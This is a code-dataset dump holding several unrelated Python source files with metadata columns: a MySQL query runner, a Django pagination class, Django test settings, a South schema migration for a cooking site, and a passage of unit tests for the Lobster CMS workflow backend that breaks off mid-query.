] | null | null | null | lib/FluentDB/core/mysql/queryRunner.py | olavoasantos/FluentDB | ab645d2c4e3c73971ca259e89feaa2b967b22e8e | [
"MIT"
] | null | null | null | from .connection import MysqlConnection
class MysqlQueryRunner(object):
# MySQL connection
connection = None
# MySQL cursor
cursor = None
def __init__(self, connection: MysqlConnection):
self.connection = connection
self.cursor = self.connection.cursor()
pass
def create(self, query):
self.cursor.execute(query)
self.close()
pass
def insert(self, query, values=""):
self.cursor.execute(query, values)
id = self.cursor.lastrowid
self.connection.commit()
return id
def update(self, query, values=""):
self.cursor.execute(query, values)
self.connection.commit()
pass
def delete(self, query, values=""):
self.cursor.execute(query, values)
self.connection.commit()
pass
def all(self, query):
self.cursor.execute(query)
results = []
for row in self.cursor.fetchall():
results.append(dict(zip(self.cursor.column_names, row)))
return results
def first(self, query):
self.cursor.execute(query)
results = self.cursor.fetchone()
return results
def many(self, query, size=10):
self.cursor.execute(query)
results = self.cursor.fetchmany(size)
return results
def close(self):
self.cursor.close()
self.connection.close()
pass
| 21.014706 | 68 | 0.60042 | 154 | 1,429 | 5.538961 | 0.279221 | 0.164127 | 0.139508 | 0.180539 | 0.397421 | 0.397421 | 0.361079 | 0.214537 | 0.164127 | 0.164127 | 0 | 0.001982 | 0.293912 | 1,429 | 67 | 69 | 21.328358 | 0.843409 | 0.020294 | 0 | 0.418605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.209302 | false | 0.116279 | 0.023256 | 0 | 0.395349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
d9a6232f730b3b1df68f795d83cefad179df087e | 126 | py | Python | CONFIG/CommentAPP/API/paginations.py | Brktrlw/Instagram-Clone-Django-and-React | 6390db2133d3beae2097a680097e170bd4fbcabe | [
"MIT",
"PostgreSQL",
"Unlicense"
] | null | null | null | CONFIG/CommentAPP/API/paginations.py | Brktrlw/Instagram-Clone-Django-and-React | 6390db2133d3beae2097a680097e170bd4fbcabe | [
"MIT",
"PostgreSQL",
"Unlicense"
] | null | null | null | CONFIG/CommentAPP/API/paginations.py | Brktrlw/Instagram-Clone-Django-and-React | 6390db2133d3beae2097a680097e170bd4fbcabe | [
"MIT",
"PostgreSQL",
"Unlicense"
] | null | null | null | from rest_framework.pagination import PageNumberPagination
class CommentPagination(PageNumberPagination):
page_size = 11
| 25.2 | 58 | 0.849206 | 12 | 126 | 8.75 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017857 | 0.111111 | 126 | 4 | 59 | 31.5 | 0.919643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d9ad62a58cee51c008acd46ef60fcd00681c6dd9 | 2,024 | py | Python | config/settings/test.py | wooheet/tedygram | 481c5d1fd44f12cf9f5c62e0f12dd3f80c0c1de4 | [
"MIT"
] | null | null | null | config/settings/test.py | wooheet/tedygram | 481c5d1fd44f12cf9f5c62e0f12dd3f80c0c1de4 | [
"MIT"
] | null | null | null | config/settings/test.py | wooheet/tedygram | 481c5d1fd44f12cf9f5c62e0f12dd3f80c0c1de4 | [
"MIT"
] | null | null | null | """
With these settings, tests run faster.
"""
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY", default="OzYQOY7S3UVfDHeavSrjAmN6TMPxKxa7cqV82SaTDD6DaHNNhF7BZAOUCN8VFwPk")
# https://docs.djangoproject.com/en/dev/ref/settings/#test-runner
TEST_RUNNER = "django.test.runner.DiscoverRunner"
# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
"default": {
"BACKEND": "django.core.cache.backends.locmem.LocMemCache", "LOCATION": ""
}
}
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = ["django.contrib.auth.hashers.MD5PasswordHasher"]
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[0]["OPTIONS"]["debug"] = DEBUG # noqa F405
TEMPLATES[0]["OPTIONS"]["loaders"] = [ # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = "django.core.mail.backends.locmem.EmailBackend"
# https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = "localhost"
# https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = 1025
# Your stuff...
# ------------------------------------------------------------------------------
| 36.142857 | 113 | 0.546443 | 184 | 2,024 | 5.961957 | 0.342391 | 0.073838 | 0.180492 | 0.205105 | 0.350046 | 0.350046 | 0.350046 | 0.350046 | 0.125798 | 0 | 0 | 0.012035 | 0.096838 | 2,024 | 55 | 114 | 36.8 | 0.588074 | 0.568676 | 0 | 0 | 0 | 0 | 0.516206 | 0.427371 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.041667 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d9dbe1564fc700c61b7507bb9b58065a2f63e0e5 | 14,490 | py | Python | povary/apps/master_class/migrations/0009_auto__add_field_masterclass_visits_num__add_field_categorymc_visits_nu.py | TorinAsakura/cooking | cf0c78f613fa9ce0fcd4ec7a397ab880d9dd631a | [
"BSD-3-Clause"
] | null | null | null | povary/apps/master_class/migrations/0009_auto__add_field_masterclass_visits_num__add_field_categorymc_visits_nu.py | TorinAsakura/cooking | cf0c78f613fa9ce0fcd4ec7a397ab880d9dd631a | [
"BSD-3-Clause"
] | null | null | null | povary/apps/master_class/migrations/0009_auto__add_field_masterclass_visits_num__add_field_categorymc_visits_nu.py | TorinAsakura/cooking | cf0c78f613fa9ce0fcd4ec7a397ab880d9dd631a | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'MasterClass.visits_num'
db.add_column('master_class_masterclass', 'visits_num',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CategoryMC.visits_num'
db.add_column('master_class_categorymc', 'visits_num',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'SubCategoryMC.visits_num'
db.add_column('master_class_subcategorymc', 'visits_num',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
def backwards(self, orm):
# Deleting field 'MasterClass.visits_num'
db.delete_column('master_class_masterclass', 'visits_num')
# Deleting field 'CategoryMC.visits_num'
db.delete_column('master_class_categorymc', 'visits_num')
# Deleting field 'SubCategoryMC.visits_num'
db.delete_column('master_class_subcategorymc', 'visits_num')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'ingredients.usaingredient': {
'Meta': {'object_name': 'USAIngredient'},
'alpha_carot': ('django.db.models.fields.FloatField', [], {}),
'ash': ('django.db.models.fields.FloatField', [], {}),
'beta_carot': ('django.db.models.fields.FloatField', [], {}),
'beta_crypt': ('django.db.models.fields.FloatField', [], {}),
'calcium': ('django.db.models.fields.FloatField', [], {}),
'carbohydrt': ('django.db.models.fields.FloatField', [], {}),
'cholestrl': ('django.db.models.fields.FloatField', [], {}),
'choline_total': ('django.db.models.fields.FloatField', [], {}),
'copper': ('django.db.models.fields.FloatField', [], {}),
'energy': ('django.db.models.fields.FloatField', [], {}),
'fa_mono': ('django.db.models.fields.FloatField', [], {}),
'fa_poly': ('django.db.models.fields.FloatField', [], {}),
'fa_sat': ('django.db.models.fields.FloatField', [], {}),
'fiber_td': ('django.db.models.fields.FloatField', [], {}),
'folate_dfe': ('django.db.models.fields.FloatField', [], {}),
'folate_total': ('django.db.models.fields.FloatField', [], {}),
'folic_acid': ('django.db.models.fields.FloatField', [], {}),
'food_folate': ('django.db.models.fields.FloatField', [], {}),
'gm_wt1': ('django.db.models.fields.FloatField', [], {}),
'gmwt_2': ('django.db.models.fields.FloatField', [], {}),
'gmwt_desc1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'gmwt_desc2': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iron': ('django.db.models.fields.FloatField', [], {}),
'lipid_total': ('django.db.models.fields.FloatField', [], {}),
'lut_zea': ('django.db.models.fields.FloatField', [], {}),
'lycopene': ('django.db.models.fields.FloatField', [], {}),
'magnesium': ('django.db.models.fields.FloatField', [], {}),
'manganese': ('django.db.models.fields.FloatField', [], {}),
'name_rus': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'ndb_no': ('django.db.models.fields.PositiveIntegerField', [], {'unique': 'True'}),
'niacin': ('django.db.models.fields.FloatField', [], {}),
'panto_acid': ('django.db.models.fields.FloatField', [], {}),
'phosphorus': ('django.db.models.fields.FloatField', [], {}),
'potassium': ('django.db.models.fields.FloatField', [], {}),
'protein': ('django.db.models.fields.FloatField', [], {}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'refuse_pct': ('django.db.models.fields.FloatField', [], {}),
'retinol': ('django.db.models.fields.FloatField', [], {}),
'riboflavin': ('django.db.models.fields.FloatField', [], {}),
'selenium': ('django.db.models.fields.FloatField', [], {}),
'short_description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sodium': ('django.db.models.fields.FloatField', [], {}),
'sugar_total': ('django.db.models.fields.FloatField', [], {}),
'thiamin': ('django.db.models.fields.FloatField', [], {}),
'translated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'updatable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'vi_vit_d_ui': ('django.db.models.fields.FloatField', [], {}),
'vitamin_a_rae': ('django.db.models.fields.FloatField', [], {}),
'vitamin_a_ui': ('django.db.models.fields.FloatField', [], {}),
'vitamin_b12': ('django.db.models.fields.FloatField', [], {}),
'vitamin_b6': ('django.db.models.fields.FloatField', [], {}),
'vitamin_c': ('django.db.models.fields.FloatField', [], {}),
'vitamin_d': ('django.db.models.fields.FloatField', [], {}),
'vitamin_e': ('django.db.models.fields.FloatField', [], {}),
'vitamin_k': ('django.db.models.fields.FloatField', [], {}),
'water': ('django.db.models.fields.FloatField', [], {}),
'zinc': ('django.db.models.fields.FloatField', [], {})
},
'master_class.categorymc': {
'Meta': {'object_name': 'CategoryMC'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visits_num': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'master_class.ingredient': {
'Meta': {'object_name': 'Ingredient'},
'addit_info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ingredient_group': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'ingredient_info': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'usa_ingredients'", 'to': "orm['ingredients.USAIngredient']"}),
'master_class': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ingredients'", 'to': "orm['master_class.MasterClass']"}),
'measure': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'master_class.masterclass': {
'Meta': {'object_name': 'MasterClass'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['master_class.CategoryMC']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'for_registered': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'ip_addr': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['master_class.SubCategoryMC']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visits_num': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'master_class.mcstep': {
'Meta': {'object_name': 'MCStep'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'master_class': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'masterclasses'", 'to': "orm['master_class.MasterClass']"}),
'step_num': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'master_class.mctool': {
'Meta': {'object_name': 'MCTool'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'master_class.subcategorymc': {
'Meta': {'object_name': 'SubCategoryMC'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['master_class.CategoryMC']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visits_num': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
}
}
complete_apps = ['master_class'] | 71.732673 | 182 | 0.560663 | 1,410 | 14,490 | 5.631915 | 0.142553 | 0.134996 | 0.234479 | 0.33497 | 0.807203 | 0.687067 | 0.576879 | 0.482811 | 0.423246 | 0.37023 | 0 | 0.008058 | 0.20352 | 14,490 | 202 | 183 | 71.732673 | 0.68001 | 0.017736 | 0 | 0.227027 | 0 | 0 | 0.578518 | 0.379657 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010811 | false | 0.005405 | 0.021622 | 0 | 0.048649 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d9ef7bc19df1f760e5131e5f11c5169b128045dd | 24,188 | py | Python | test/test_cms_backend.py | khurtado/lobster | cd7044b4b98bec2d8b5f81512adcf2a5dfca00f1 | [
"MIT"
] | 1 | 2018-03-06T19:33:17.000Z | 2018-03-06T19:33:17.000Z | test/test_cms_backend.py | khurtado/lobster | cd7044b4b98bec2d8b5f81512adcf2a5dfca00f1 | [
"MIT"
] | 18 | 2018-03-08T09:55:57.000Z | 2020-08-10T19:19:04.000Z | test/test_cms_backend.py | khurtado/lobster | cd7044b4b98bec2d8b5f81512adcf2a5dfca00f1 | [
"MIT"
] | 3 | 2018-03-06T19:33:20.000Z | 2019-02-25T22:50:23.000Z | # vim: foldmethod=marker
import os
import shutil
import tempfile
from lobster import cmssw, se
from lobster.cmssw.dataset import DatasetInfo
from lobster.core.task import TaskHandler
from lobster.core.unit import TaskUpdate, UnitStore
from lobster.core.config import Config, AdvancedOptions
from lobster.core.workflow import Workflow
class DummyInterface(object):
def update_units(self, data):
self.data = data
class DummyTask(object):
def __init__(self, id, code):
self.tag = id
self.return_status = code
self.output = None
# TODO finish
class TestSQLBackend(object):
def setup(self):
with self.interface.db as db:
db.execute("delete from workflows")
@classmethod
def setup_class(cls):
os.environ['LOCALRT'] = ''
cls.workdir = tempfile.mkdtemp()
cls.interface = UnitStore(
Config(
label='test',
workdir=cls.workdir,
storage=se.StorageConfiguration(output=['file://' + cls.workdir]),
workflows=[],
advanced=AdvancedOptions(proxy=False, dashboard=False, osg_version="3.3")
)
)
@classmethod
def teardown_class(cls):
pass
def create_file_dataset(self, label, files, tasksize):
info = DatasetInfo()
info.file_based = True
info.tasksize = tasksize
for fn in ['/test/{0}.root'.format(i) for i in range(files)]:
info.files[fn].lumis = [(-1, -1)]
info.total_units = len(info.files.keys())
info.path = ''
return Workflow(label, None, command="foo"), info
def create_dbs_dataset(self, label, lumi_events=100, lumis=14, filesize=3.5, tasksize=5):
# {{{
info = DatasetInfo()
info.total_events = lumi_events * lumis
info.tasksize = tasksize
info.path = ''
file_size = 0
file_count = 0
file_events = 0
file_lumis = []
events = map(list, enumerate([lumi_events] * lumis))
while len(events) > 0:
(lumi, size) = events[0]
file_size += float(size) / lumi_events
file_events += size
file_lumis.append((1, lumi + 1))
if file_size > filesize:
remove = file_size - filesize
remove_events = int(lumi_events * remove)
file_size -= remove
file_events -= remove_events
events[0][1] = remove_events
else:
events.pop(0)
if file_size == filesize:
f = '/test/{0}.root'.format(file_count)
info.files[f].events = file_events
info.files[f].lumis = file_lumis
file_count += 1
file_size = 0
file_events = 0
file_lumis = []
if file_size > 0:
f = '/test/{0}.root'.format(file_count)
info.files[f].events = file_events
info.files[f].lumis = file_lumis
lumis = sum([finfo.lumis for finfo in info.files.values()], [])
info.total_units = len(lumis)
total_lumis = len(set(lumis))
info.stop_on_file_boundary = (total_lumis != info.total_units)
return Workflow(label, None, command="foo"), info
# }}}
def test_create_datasets(self):
# {{{
cfg, info = self.create_dbs_dataset('test', 100, 11, 2.2, 3)
total = 0
assert len(info.files) == 5
for fn, finfo in info.files.items():
total += finfo.events
assert len(finfo.lumis) == 3
assert total == 1100
# }}}
def test_handler(self):
# {{{
self.interface.register_dataset(
*self.create_dbs_dataset(
'test_handler', lumis=11, filesize=2.2, tasksize=3))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_handler', 1)[0]
handler = TaskHandler(123, 'test_handler', files, lumis, 'test', True)
files_info = {
u'/test/0.root': (220, [(1, 1), (1, 2), (1, 3)])
}
files_skipped = []
events_written = 123
update = TaskUpdate()
file_update, unit_update = \
handler.get_unit_info(False, update, files_info, files_skipped, events_written)
assert update.units_processed == 3
assert update.events_read == 220
assert update.events_written == 123
assert update.status == 2
assert file_update == [(220, 0, 1)]
assert unit_update == []
# }}}
def test_obtain(self):
# {{{
self.interface.register_dataset(
*self.create_dbs_dataset(
'test_obtain', lumis=20, filesize=2.2, tasksize=3))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_obtain', 1)[0]
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 3
assert jd == 0
assert er in (0, None)
assert ew in (0, None)
(jr, jd) = self.interface.db.execute(
"select units_running, units_done from files_test_obtain where filename='/test/0.root'").fetchone()
assert jr == 3
assert jd == 0
# }}}
def test_obtain_split(self):
# {{{
self.interface.register_dataset(
*self.create_dbs_dataset('test_obtain_split', lumis=20, filesize=2.2, tasksize=10))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_obtain_split', 1)[0]
(stop_on_file_boundary,) = self.interface.db.execute(
"select stop_on_file_boundary from workflows where label=?", ('test_obtain_split',)).fetchone()
assert len(files) == 1
assert stop_on_file_boundary == 1
# }}}
def test_return_good(self):
# {{{
self.interface.register_dataset(
*self.create_dbs_dataset(
'test_good', lumis=20, filesize=3.0, tasksize=6))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_good', 1)[0]
task_update = TaskUpdate(host='hostname', id=id)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
False,
task_update,
{
'/test/0.root': (300, [(1, 1), (1, 2), (1, 3)]),
'/test/1.root': (60, [(1, 4), (1, 5), (1, 6)])
},
[],
100
)
self.interface.update_units({(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 6
assert er == 360
assert ew == 100
(id, jr, jd, er) = self.interface.db.execute(
"select id, units_running, units_done, events_read from files_test_good where filename='/test/0.root'").fetchone()
assert jr == 0
assert jd == 3
assert er == 300
(id, jr, jd, er) = self.interface.db.execute(
"select id, units_running, units_done, events_read from files_test_good where filename='/test/1.root'").fetchone()
assert jr == 0
assert jd == 3
assert er == 60
# }}}
def test_return_good_split(self):
# {{{
self.interface.register_dataset(
*self.create_dbs_dataset('test_good_split', lumis=20, filesize=2.2, tasksize=6))
tasks = self.interface.pop_units('test_good_split', 1)
assert(len(tasks) == 1)
(id, label, files, lumis, arg, _) = tasks[0]
task_update = TaskUpdate(host='hostname', id=id)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
False,
task_update,
{
'/test/0.root': (220, [(1, 1), (1, 2), (1, 3)]),
},
[],
100
)
self.interface.update_units({(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""", (label,)).fetchone()
assert jr == 0
assert jd == 3
assert er == 220
assert ew == 100
(id, jr, jd, er) = self.interface.db.execute(
"select id, units_running, units_done, events_read from files_test_good_split where filename='/test/0.root'").fetchone()
assert jr == 0
assert jd == 3
assert er == 220
# }}}
def test_return_bad(self):
# {{{
self.interface.register_dataset(*self.create_dbs_dataset('test_bad'))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_bad', 1)[0]
task_update = TaskUpdate(
exit_code=123,
host='hostname',
id=id,
submissions=1)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
True,
task_update,
{},
[],
0
)
self.interface.update_units(
{(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 0
assert er in (0, None)
assert ew in (0, None)
(id, jr, jd, er) = self.interface.db.execute(
"select id, units_running, units_done, events_read from files_test_bad where filename='/test/0.root'").fetchone()
assert jr == 0
assert jd == 0
assert er in (0, None)
# }}}
def test_return_bad_again(self):
# {{{
self.interface.register_dataset(*self.create_dbs_dataset(
'test_bad_again', lumis=20, filesize=2.2, tasksize=6))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_bad_again', 1)[0]
task_update = TaskUpdate(
exit_code=123,
host='hostname',
id=id,
submissions=1)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
True,
task_update,
{
'/test/0.root': (220, [(1, 1), (1, 2), (1, 3)]),
'/test/1.root': (220, [(1, 3), (1, 4), (1, 5)]),
'/test/2.root': (160, [(1, 5), (1, 6)])
},
[],
100
)
self.interface.update_units(
{(label, "units_" + label): [(task_update, file_update, unit_update)]})
(jr, jd, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
(select sum(events_read) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id),
(select sum(events_written) from tasks where status in (2, 6, 8) and type = 0 and workflow = workflows.id)
from workflows where label=?""",
(label,)).fetchone()
assert jr == 0
assert jd == 0
assert er in (0, None)
assert ew in (0, None)
(id, jr, jd, er) = self.interface.db.execute(
"select id, units_running, units_done, events_read from files_test_bad_again where filename='/test/0.root'").fetchone()
assert jr == 0
assert jd == 0
assert er in (0, None)
# }}}
def test_return_ugly(self):
# {{{
self.interface.register_dataset(
*self.create_dbs_dataset(
'test_ugly', lumis=11, filesize=3, tasksize=6))
(id, label, files, lumis, arg, _) = self.interface.pop_units('test_ugly', 1)[0]
task_update = TaskUpdate(host='hostname', id=id)
handler = TaskHandler(id, label, files, lumis, None, True)
file_update, unit_update = handler.get_unit_info(
False,
task_update,
{
'/test/0.root': (120, [(1, 2), (1, 3)])
},
['/test/1.root'],
50
)
self.interface.update_units(
{(label, "units_" + label): [(task_update, file_update, unit_update)]})
skipped = list(
self.interface.db.execute(
"select skipped from files_{0}".format(label)))
assert skipped == [(0,), (1,), (0,), (0,)]
status = list(
self.interface.db.execute(
"select status from units_{0} where file=2 group by status".format(label)))
assert status == [(3,)]
(jr, jd, jl, er, ew) = self.interface.db.execute("""
select
units_running,
units_done,
units_left,
